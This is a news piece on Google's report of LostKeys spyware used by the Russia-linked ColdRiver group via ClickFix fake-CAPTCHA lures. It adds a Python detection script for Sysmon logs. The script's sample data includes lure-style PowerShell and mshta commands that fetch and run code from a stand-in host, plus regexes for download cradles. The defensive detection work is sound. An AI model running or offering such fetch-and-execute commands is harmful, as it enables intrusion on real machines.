Google has disclosed (as reported by Android Headlines) a new piece of spyware known as LostKeys, used by the ColdRiver hacking group, which is linked to Russia's FSB. The malware is built to steal files and system data from Western organizations.
According to the Google Threat Intelligence Group (GTIG), LostKeys is used in targeted ClickFix-style attacks that rely on social engineering and begin with a fake CAPTCHA page. Victims are tricked into running a malicious PowerShell command, which then downloads and executes further stages. The final goal is to install LostKeys, which works like a digital vacuum cleaner, collecting files, directory listings and system information. The group also uses other malware, including SPICA, to obtain documents.
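The ClickFix chain described above (a user copying a PowerShell command from a fake CAPTCHA page into the Run box or a console) leaves a recognisable shape in process-creation telemetry. The following is an added example of a detection heuristic for that shape; it is not Google's or GTIG's detection logic and is not derived from LostKeys samples. It assumes Sysmon Event ID 1 records exported as JSON lines with the fields `Image`, `ParentImage`, `CommandLine` and `ProcessId`; the sample records, the indicator regexes and the `verify.example.invalid` hostnames are all constructed for illustration.

```python
"""Heuristic detection for ClickFix-style script-host launches.

Added example, not GTIG's or Google's detection logic. Assumes a JSON-lines
export of Sysmon Event ID 1 (process creation). The indicator list is a
starting point for tuning against your own EDR telemetry.
"""
import json
import ntpath
import re
from dataclasses import dataclass

# Processes a user drives directly: the Win+R Run box is hosted by
# explorer.exe, and browsers are where the fake CAPTCHA page is shown.
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Script hosts that ClickFix-style lures typically ask the victim to run.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# (name, regex) pairs; each is an assumption about what a lure command looks like.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("execution_policy_bypass", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
        r"|\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*\|\s*(?:iex|invoke-expression)\b",
        re.I)),
    ("mshta_remote", re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)),
    # Lures often append a fake "verification" comment so the Run box looks benign.
    ("captcha_lure_text", re.compile(r"i am not a robot|verify you are human|captcha", re.I)),
]

# Constructed sample telemetry (not real LostKeys or ColdRiver data).
SAMPLE_LOGS = [
    r'{"EventID": 1, "ProcessId": 4412, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iex (irm https://verify.example.invalid/check)\" # \"I am not a robot - reCAPTCHA Verification ID: 7421\""}',
    r'{"EventID": 1, "ProcessId": 5120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1"}',
    r'{"EventID": 1, "ProcessId": 6604, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoExit -Command Set-Location C:\\src"}',
    r'{"EventID": 1, "ProcessId": 7012, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "CommandLine": "mshta https://verify.example.invalid/verify.hta"}',
    r'{"EventID": 1, "ProcessId": 7310, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}',
]


@dataclass
class Finding:
    process_id: int
    image: str
    parent_image: str
    reasons: list


def _basename(path: str) -> str:
    # ntpath handles Windows separators even when run on a non-Windows analyst box.
    return ntpath.basename(path).lower()


def indicators_for(command_line: str) -> list:
    """Return the names of every indicator that matches the command line."""
    return [name for name, rx in INDICATORS if rx.search(command_line)]


def analyze_event(event: dict):
    """Return a Finding for a suspicious process-creation event, else None.

    A script host spawned by a user-facing parent needs one indicator to be
    flagged; from any other parent it needs at least two, to reduce noise
    from legitimate automation that uses hidden windows or encoded commands.
    """
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if image not in SCRIPT_HOSTS:
        return None
    hits = indicators_for(event.get("CommandLine", ""))
    if not hits:
        return None
    if parent in USER_FACING_PARENTS or len(hits) >= 2:
        return Finding(int(event.get("ProcessId", 0)), image, parent, hits)
    return None


def scan(lines) -> list:
    """Parse JSON-lines telemetry and return all findings in input order."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        finding = analyze_event(json.loads(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"PID {f.process_id}: {f.parent_image} -> {f.image} [{', '.join(f.reasons)}]")
```

Run against the constructed sample, the scan flags the three lure-shaped launches (PIDs 4412, 7012 and 7310) and leaves the scheduled backup script and the developer's interactive shell alone. In practice the indicator list and the parent-process rule need tuning per environment, and a match should pivot to the script-block logging (Event ID 4104) for the flagged process to see what the downloaded stage actually did.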
The ColdRiver group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. Reports indicate that it has intensified its activities in recent years, especially since Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and non-governmental organizations.
The U.S. has already imposed sanctions against certain members of the group and announced a reward of $10 million for information leading to their capture.
Google's analysts stress the need to strengthen defences, particularly at organizations that fit ColdRiver's targeting profile. They recommend enrolling high-risk users in Google's Advanced Protection Program and keeping security software and systems up to date to guard against similar threats.
